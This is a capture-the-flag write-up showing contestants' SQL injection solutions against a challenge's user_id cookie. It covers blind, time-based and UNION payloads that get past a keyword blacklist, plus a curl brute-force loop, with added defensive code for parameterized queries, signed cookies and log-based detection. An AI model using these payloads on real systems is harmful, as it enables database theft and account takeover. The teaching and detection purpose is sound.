Solutions for challenge 2A

Posted on July 12, 2012 by Roberto Salgado

After receiving many submissions for the SQL Injection challenge 2A, I decided it was time to show some of the solutions used to solve this challenge. In case you missed the series of SQL Injection challenges I released a few months ago, they are still online and available to try out. There are 3 challenges, each with a part A and a part B. Of all the challenges, challenge 2A turned out to be one of the easier ones, and since the solutions didn't vary much, I picked it as the first challenge to show solutions for.

DISCLAIMER: If you haven't tried this challenge, it is still available here (no longer available online) in case you want to give it a shot before reading the SOLUTIONS below.

What differentiates this challenge from the others is that it allows you to log in as guest. In doing so, a welcome message is displayed showing the username and privileges, and the cookie user_id is created. The cookie user_id, as the name says, holds the id of the user, which in the case of guest is 1. If the value of the cookie is changed to 0, the message now displays admin as the username with administrator privileges. This indicates that the username and privileges are determined from the user_id cookie, which is of course pulling that information from the MySQL database. Now that we know the injection point is the cookie user_id, the next step is to figure out which characters are allowed and which are filtered.

The main idea behind this challenge is to figure out a way to retrieve the table/column names without using information_schema.tables/columns. For this reason, I decided to use very little filtering. Initially I had only blacklisted the following characters:

$blacklist = array('tables', 'columns', '(', ')');

Many WAFs rely on blocking the keywords 'tables' and 'columns', so I wanted to demonstrate that an attacker doesn't need those keywords in order to obtain the table/column names; I later added mysql_real_escape_string() as an extra layer of difficulty. Basically, there are several other tables from which the table/column names can be obtained besides information_schema.tables/columns, which are the two widely known ones. The only condition is that some of them require the table/column to have a key, and since every table should have a primary key, chances are high that this will work. Some examples are:

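The cookie handling described above (a keyword blacklist in front of a query that the user_id cookie is concatenated into) is the defect at the centre of this challenge. The following is an added example, not code from the original post or the challenge itself: it models that vulnerable lookup in Python against an in-memory SQLite stand-in for the users table, then shows two hardened versions. The first accepts only a short decimal id and binds it as a query parameter, which closes the injection but still lets a client pick user_id=0 and become admin, exactly the behaviour the post describes. The second issues and verifies an HMAC-signed cookie so a tampered id is rejected before it reaches the database. The table and column names, the signing key and the sample cookie values are constructed for the example; the blacklist is the one quoted in the post, with case-insensitive substring matching assumed.

```python
import hashlib
import hmac
import re
import sqlite3

# Blacklist quoted in the post; the mysql_real_escape_string() layer added
# later is not modelled. Case-insensitive substring matching is an assumption.
BLACKLIST = ["tables", "columns", "(", ")"]
USER_ID_RE = re.compile(r"[0-9]{1,10}")


def make_db():
    """Constructed stand-in for the challenge's users table (SQLite in memory,
    so the example runs offline); the column names are assumptions."""
    db = sqlite3.connect(":memory:")
    db.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, privileges TEXT)"
    )
    db.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [(0, "admin", "administrator"), (1, "guest", "guest")],
    )
    return db


def blacklist_allows(cookie_value):
    """True when the challenge's blacklist would let the value through."""
    lowered = cookie_value.lower()
    return not any(term in lowered for term in BLACKLIST)


def lookup_unsafe(db, cookie_value):
    """The vulnerable pattern: keyword blacklist, then the raw cookie value is
    concatenated into the query, so anything that avoids the four blacklisted
    tokens still reaches the SQL parser."""
    if not blacklist_allows(cookie_value):
        return None
    query = "SELECT username, privileges FROM users WHERE id = " + cookie_value
    return db.execute(query).fetchone()


def lookup_typed(db, cookie_value):
    """Hardened against injection: accept only a short decimal string and bind
    it as a parameter. It still trusts the client's choice of id, so user_id=0
    remains an authorization hole (the admin-via-cookie behaviour in the post)."""
    if not USER_ID_RE.fullmatch(cookie_value):
        return None
    return db.execute(
        "SELECT username, privileges FROM users WHERE id = ?", (int(cookie_value),)
    ).fetchone()


def sign_cookie(user_id, key):
    """Issue 'user_id.<hmac-sha256 hex>' so the server can detect tampering."""
    mac = hmac.new(key, str(user_id).encode(), hashlib.sha256).hexdigest()
    return f"{user_id}.{mac}"


def lookup_signed(db, cookie_value, key):
    """Hardened against both injection and tampering: verify the MAC in
    constant time before the id is trusted, then bind it as a parameter."""
    user_id, sep, mac = cookie_value.rpartition(".")
    if not sep or not USER_ID_RE.fullmatch(user_id):
        return None
    expected = hmac.new(key, user_id.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(mac, expected):
        return None
    return db.execute(
        "SELECT username, privileges FROM users WHERE id = ?", (int(user_id),)
    ).fetchone()


if __name__ == "__main__":
    db = make_db()
    key = b"constructed-demo-key"  # constructed; a real key comes from config
    for value in ["1", "0", "0 or 1=1", "0 and id in (select id from users)"]:
        print(repr(value), blacklist_allows(value),
              lookup_unsafe(db, value), lookup_typed(db, value))
    print(lookup_signed(db, sign_cookie(1, key), key))
    print(lookup_signed(db, "0." + sign_cookie(1, key).split(".")[1], key))
```

The point of the three tiers is that the blacklist does nothing the parameter binding doesn't do better, and the parameter binding does nothing about the client choosing its own id: the cookie has to carry something the server can verify, not just a number.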
Some of the solutions I received used a method I had not anticipated when writing the challenge. This type of solution guessed the column name and extracted the password through a blind SQLi. In hindsight I should have added a prefix to the column names, so they couldn't be guessed as easily. However, I did learn something because of it: I knew the LIKE statement doesn't require quotations; what I didn't know is that you could use the wildcards % and ? without the quotations. Below are the solutions that were submitted:

Solution omitted as it can be used to solve challenge 2B.

First Category


user_id=0 and username='admin' and mid(password,1,1)='e'

Team Rebel:

user_id=0 and 1=(IF(ascii(substring(password,1,1))>100, (select benchmark(100000000,md5(0x41))), false))


user_id=0 and password LIKE "el%uitas"

NULL Life:

Submitted a PHP script found here.


user_id=0 and username=0x656c25


user_id=-1 OR password LIKE BINARY 0x{chars}25


user_id=0 and password like binary 0x456c25

Submitted a Python script found here.


user_id=0 and password like 0x[blind-here]25


userid=0 and password >= BINARY 0x41


for i in {2,3,4,5}; do for j in {0,1,2,3,4,5,6,7,8,9,0,A,B,C,D,E,F,G} ; do echo $i$j ; curl -b "user_id=0 and password LIKE 0x454C5F564552475549544153${i}${j}25" 2>&1 | grep ADMIN ;done ;done

Second Category

Sebastien Blot:


Miroslav Stampar:

user_id=-1 UNION ALL SELECT 1,2,TABLE_NAME,4 FROM information_schema.TABLE_CONSTRAINTS LIMIT 2,3

Paul da Silva:

userid=-1 union select null,COLUMN_NAME,TABLE_NAME,null from information_schema.KEY_COLUMN_USAGE where table_name<>0x7265676c6173 and table_name<>0x72756c6573 limit 0,1-- 
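Every submission above shares one property a defender can key on: the user_id cookie stops being a plain integer. The following detection example is added here and is not code from the original post or from any of the contestants. It scans constructed web-server log lines for the user_id cookie, skips numeric values, and sorts the rest into the three families seen in the submissions: time-based (benchmark), union-based, and boolean-blind (LIKE, BINARY, hex literals, comparisons). The log format, the request path and the IP addresses are assumptions; the three non-numeric cookie values in the sample are payloads quoted on this page.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Constructed sample log. Format is an assumption: NCSA combined-style
# request line, status and size, then the Cookie request header in quotes.
# The path and IPs are made up; the non-numeric user_id values are quoted
# from the submissions on this page.
SAMPLE_LOG = """\
203.0.113.5 - - [12/Jul/2012:10:00:01 +0000] "GET /challenge/ HTTP/1.1" 200 512 "user_id=1"
203.0.113.5 - - [12/Jul/2012:10:00:02 +0000] "GET /challenge/ HTTP/1.1" 200 512 "user_id=0"
198.51.100.7 - - [12/Jul/2012:10:00:03 +0000] "GET /challenge/ HTTP/1.1" 200 530 "user_id=0 and password like binary 0x456c25"
198.51.100.7 - - [12/Jul/2012:10:00:04 +0000] "GET /challenge/ HTTP/1.1" 200 530 "user_id=0 and 1=(IF(ascii(substring(password,1,1))>100, (select benchmark(100000000,md5(0x41))), false))"
198.51.100.7 - - [12/Jul/2012:10:00:05 +0000] "GET /challenge/ HTTP/1.1" 200 530 "user_id=-1 UNION ALL SELECT 1,2,TABLE_NAME,4 FROM information_schema.TABLE_CONSTRAINTS LIMIT 2,3"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "[^"]*" \d+ \d+ "(?P<cookie>[^"]*)"$'
)
COOKIE_RE = re.compile(r"(?:^|;\s*)user_id=(?P<value>[^;]*)")

# Ordered so the most specific family wins: a benchmark() payload also
# contains comparisons, and a UNION payload also contains '-1'.
CATEGORIES = [
    ("time-based", re.compile(r"\b(benchmark|sleep)\b", re.I)),
    ("union-based", re.compile(r"\bunion\b.*\bselect\b", re.I)),
    ("boolean-blind", re.compile(r"\b(like|binary|and|or)\b|0x[0-9a-f]+|[<>=]", re.I)),
]


def parse_line(line):
    """Return (client_ip, user_id cookie value) or None if the line lacks one."""
    m = LINE_RE.match(line)
    if not m:
        return None
    c = COOKIE_RE.search(m.group("cookie"))
    if not c:
        return None
    # Browsers and tools often URL-encode cookie values; decode before matching.
    return m.group("ip"), unquote(c.group("value")).strip()


def classify(value):
    """None for a benign integer id, otherwise the injection family name."""
    if re.fullmatch(r"-?[0-9]+", value):
        return None
    for name, pattern in CATEGORIES:
        if pattern.search(value):
            return name
    return "non-numeric"


def scan(log_text):
    """Run the classifier over every line; return one finding per suspicious cookie."""
    findings = []
    for line in log_text.splitlines():
        parsed = parse_line(line)
        if parsed is None:
            continue
        ip, value = parsed
        category = classify(value)
        if category:
            findings.append({"ip": ip, "category": category, "user_id": value})
    return findings


def per_source(findings):
    """Count findings per client IP, which is what an alert threshold keys on."""
    return dict(Counter(f["ip"] for f in findings))


if __name__ == "__main__":
    results = scan(SAMPLE_LOG)
    for f in results:
        print(f["ip"], f["category"], f["user_id"][:60])
    print(per_source(results))
```

Because the site only ever issues integer ids, the decisive check is the first one in classify: anything non-numeric is already worth an alert, and the family labels just tell the responder what kind of extraction was attempted. The per-source count matters for the boolean-blind and time-based families, which show up as hundreds of near-identical requests from one client rather than a single conspicuous one.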

A full list of the victors for each challenge is available here.
